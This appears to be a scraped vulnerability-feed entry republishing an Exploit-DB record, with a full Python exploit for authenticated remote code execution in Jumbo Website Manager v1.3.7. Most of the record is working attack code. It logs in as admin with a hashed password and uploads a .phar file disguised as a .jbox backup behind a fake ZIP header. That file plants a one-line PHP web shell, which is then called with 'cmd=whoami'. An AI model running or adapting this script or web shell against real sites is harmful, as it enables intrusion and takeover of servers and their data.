{“lastseen”:”2026-04-10T02:26:31″,”description”:”Exploit Title: Jumbo Website Manager – Remote Code Execution Application: Jumbo Website Manager Version: v1.3.7 Bugs: RCE Technology: PHP Vendor URL: https:\/\/sourceforge.net\/projects\/jumbo\/ Software Link: https:\/\/sourceforge.net\/projects\/jumbo\/ Date of…”,”published”:”2026-04-09T00:00:00″,”modified”:”2026-04-09T00:00:00″,”type”:”exploitdb”,”title”:”Jumbo Website Manager – Remote Code Execution”,”source”:””,”references”:””,”id”:”EDB-ID:52504″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”#Exploit Title: Jumbo Website Manager – Remote Code Execution \\r\\n#Application: Jumbo Website Manager\\r\\n#Version: v1.3.7\\r\\n#Bugs: RCE\\r\\n#Technology: PHP\\r\\n#Vendor URL: https:\/\/sourceforge.net\/projects\/jumbo\/\\r\\n#Software Link: https:\/\/sourceforge.net\/projects\/jumbo\/\\r\\n#Date of found: 28.10.2025\\r\\n#Author: Mirabbas A\u011falarov\\r\\n#Tested on: Linux \\r\\n\\r\\n\\r\\nimport requests\\r\\nfrom typing import Tuple, Optional\\r\\n\\r\\nclass JumboCMSExploit:\\r\\n def __init__(self, base_url: str = \\”http:\/\/localhost\\”):\\r\\n self.base_url = base_url\\r\\n self.session = requests.Session()\\r\\n \\r\\n def login(self, username: str, password: str) -\\u003e bool:\\r\\n \\”\\”\\”\\r\\n Login to Jumbo CMS\\r\\n \\r\\n Args:\\r\\n username: Username\\r\\n password: Password (already hashed)\\r\\n \\r\\n Returns:\\r\\n True if login successful, False otherwise\\r\\n \\”\\”\\”\\r\\n print(f\\”[*] Attempting login as: {username}\\”)\\r\\n \\r\\n url = f\\”{self.base_url}\/jumbo_files\/jumbo\/p_login.php\\”\\r\\n \\r\\n headers = {\\r\\n \\”User-Agent\\”: \\”Mozilla\/5.0 (X11; Linux x86_64; rv:144.0) Gecko\/20100101 Firefox\/144.0\\”,\\r\\n \\”Content-Type\\”: \\”application\/x-www-form-urlencoded\\”,\\r\\n \\”Origin\\”: self.base_url,\\r\\n \\”Referer\\”: f\\”{self.base_url}\/jumbo_files\/jumbo\/loginpage.php\\”,\\r\\n }\\r\\n \\r\\n data = {\\r\\n \\”username\\”: username,\\r\\n \\”password\\”: password\\r\\n }\\r\\n \\r\\n response = self.session.post(url, headers=headers, data=data, allow_redirects=False)\\r\\n \\r\\n if response.status_code in [200, 302]:\\r\\n print(f\\”[+] Login successful! Status: {response.status_code}\\”)\\r\\n print(f\\”[+] Cookies: {self.session.cookies.get_dict()}\\”)\\r\\n return True\\r\\n else:\\r\\n print(f\\”[-] Login failed! Status: {response.status_code}\\”)\\r\\n return False\\r\\n \\r\\n def upload_file(self, filename: str, content: bytes) -\\u003e Tuple[bool, str]:\\r\\n \\”\\”\\”\\r\\n Upload a file to the backup manager\\r\\n \\r\\n Args:\\r\\n filename: Name of file to upload (e.g., test.phar)\\r\\n content: Binary content of the file\\r\\n \\r\\n Returns:\\r\\n Tuple of (success, response_text)\\r\\n \\”\\”\\”\\r\\n print(f\\”[*] Uploading file: {filename}\\”)\\r\\n \\r\\n url = f\\”{self.base_url}\/jumbo_files\/jumbo\/backupmanager\/fileupload\/php.php\\”\\r\\n \\r\\n params = {\\”qqfile\\”: filename}\\r\\n \\r\\n # Disguise .phar as .jbox\\r\\n display_name = filename.replace(‘.phar’, ‘.jbox’)\\r\\n \\r\\n headers = {\\r\\n \\”User-Agent\\”: \\”Mozilla\/5.0 (X11; Linux x86_64; rv:144.0) Gecko\/20100101 Firefox\/144.0\\”,\\r\\n \\”Accept\\”: \\”*\/*\\”,\\r\\n \\”X-Requested-With\\”: \\”XMLHttpRequest\\”,\\r\\n \\”X-File-Name\\”: display_name,\\r\\n \\”Content-Type\\”: \\”application\/octet-stream\\”,\\r\\n \\”Origin\\”: self.base_url,\\r\\n \\”Referer\\”: f\\”{self.base_url}\/jumbo_files\/jumbo\/backupmanager\/loadbackup.php\\”,\\r\\n }\\r\\n \\r\\n response = self.session.post(url, params=params, headers=headers, data=content)\\r\\n \\r\\n if response.status_code == 200:\\r\\n print(f\\”[+] Upload successful!\\”)\\r\\n print(f\\”[+] Response: {response.text}\\”)\\r\\n return True, response.text\\r\\n else:\\r\\n print(f\\”[-] Upload failed! Status: {response.status_code}\\”)\\r\\n return False, response.text\\r\\n \\r\\n def exploit(self, username: str, password: str, filename: str, php_code: str) -\\u003e bool:\\r\\n \\”\\”\\”\\r\\n Complete exploit: Login + Upload\\r\\n \\r\\n Args:\\r\\n username: Login username\\r\\n password: Login password (hashed)\\r\\n filename: Filename to upload\\r\\n php_code: PHP code to execute\\r\\n \\r\\n Returns:\\r\\n True if exploit successful\\r\\n \\”\\”\\”\\r\\n # Step 1: Login\\r\\n if not self.login(username, password):\\r\\n print(\\”[-] Exploit failed at login stage\\”)\\r\\n return False\\r\\n \\r\\n # Step 2: Create malicious file content\\r\\n # PK header to disguise as archive\\r\\n file_content = b’PK\\\\x03\\\\x04\\\\x0a\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00′ + php_code.encode()\\r\\n \\r\\n # Step 3: Upload\\r\\n success, response = self.upload_file(filename, file_content)\\r\\n \\r\\n if success:\\r\\n print(\\”\\\\n[+] Exploit completed successfully!\\”)\\r\\n uploaded_path = f\\”{self.base_url}\/jumbo_files\/jumbo\/backupmanager\/fileupload\/uploads\/backup.phar?cmd=whoami\\”\\r\\n print(f\\”[+] File possibly uploaded to: {uploaded_path}\\”)\\r\\n return True\\r\\n else:\\r\\n print(\\”[-] Exploit failed at upload stage\\”)\\r\\n return False\\r\\n\\r\\n\\r\\nif __name__ == \\”__main__\\”:\\r\\n print(\\”=\\”*70)\\r\\n print(\\”Jumbo CMS Authenticated RCE via File Upload Exploit\\”)\\r\\n print(\\”=\\”*70)\\r\\n print()\\r\\n \\r\\n # Configuration\\r\\n TARGET = \\”http:\/\/localhost\\”\\r\\n USERNAME = \\”admin\\”\\r\\n PASSWORD = \\”6f7303f028531527b2da3620ccaf25ee384ae7db\\” \\r\\n FILENAME = \\”test123.phar\\”\\r\\n PHP_CODE = ‘\\u003c?php echo system($_GET[\\”cmd\\”]);?\\u003e’\\r\\n \\r\\n # Run exploit\\r\\n exploit = JumboCMSExploit(TARGET)\\r\\n exploit.exploit(USERNAME, PASSWORD, FILENAME, PHP_CODE)”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52504″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52504″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-10T02:26:31″,”description”:”Exploit Title: Jumbo Website Manager – Remote Code Execution Application: Jumbo Website Manager Version: v1.3.7 Bugs: RCE Technology: PHP Vendor URL: https:\/\/sourceforge.net\/projects\/jumbo\/ Software Link: https:\/\/sourceforge.net\/projects\/jumbo\/…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,40,13,33,7,11,5],"class_list":["post-42440","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-exploitdb","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n